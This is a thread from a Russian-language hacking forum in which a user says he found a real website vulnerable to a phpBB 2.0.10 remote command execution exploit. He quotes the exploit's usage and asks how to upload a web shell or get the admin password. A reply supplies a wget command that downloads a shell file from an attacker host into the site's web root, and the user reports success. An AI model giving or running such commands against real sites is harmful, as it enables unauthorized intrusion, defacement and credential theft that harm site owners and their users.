HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2010, 15:35
FlooP1k
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами: 8311286

Репутация: 48
По умолчанию

Вобщем нашел очень "жирный" сайт на который прошел эксплоит:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]phpBB 2.0.10 Пропустим версии с 7 по 9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]т[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]к[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]в них присутствует те же уязвимости[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]что и в phpBB 2.0.10[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Цель[/COLOR][COLOR="#007700"]: ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Выполение произвольных команд[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Была выпущена так же в 2002. Данная версия встречается намного чаще[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]чем младшие[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Но реже чем старшие[/COLOR][COLOR="#007700"]=).[/COLOR][COLOR="#0000BB"]Был произведён дефейс сайта phpbb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]с помощью найденной уязвимости в этой версии[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание уязвимости[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Некорректная обработка входных параметров в viewtopic[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Exploit[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix /threadnav7345-1-10.html)[/COLOR][/COLOR] 
Конечно же темы /threadnav7345-1-10.html с *nix командами уже не существует, от сюда и возникает вопрос какие команды нужно использовать что бы залить шелл или получить пароль админа и потом залить шелл ?
 
Ответить с цитированием

  #2  
Старый 31.07.2010, 15:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

wget http://attacker.ru/shell.txt -O /home/www/htdocs/1.php

ну или как то так
 
Ответить с цитированием

  #3  
Старый 31.07.2010, 15:44
FlooP1k
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами: 8311286

Репутация: 48
По умолчанию

похоже немного по другому потому что пишет:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wget: missing URL

Usage: wget [OPTION]... ...

Try `wget --help' for more options.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Ответить с цитированием

  #4  
Старый 31.07.2010, 16:20
FlooP1k
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами: 8311286

Репутация: 48
По умолчанию

а все разобрался спасибо большое ...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...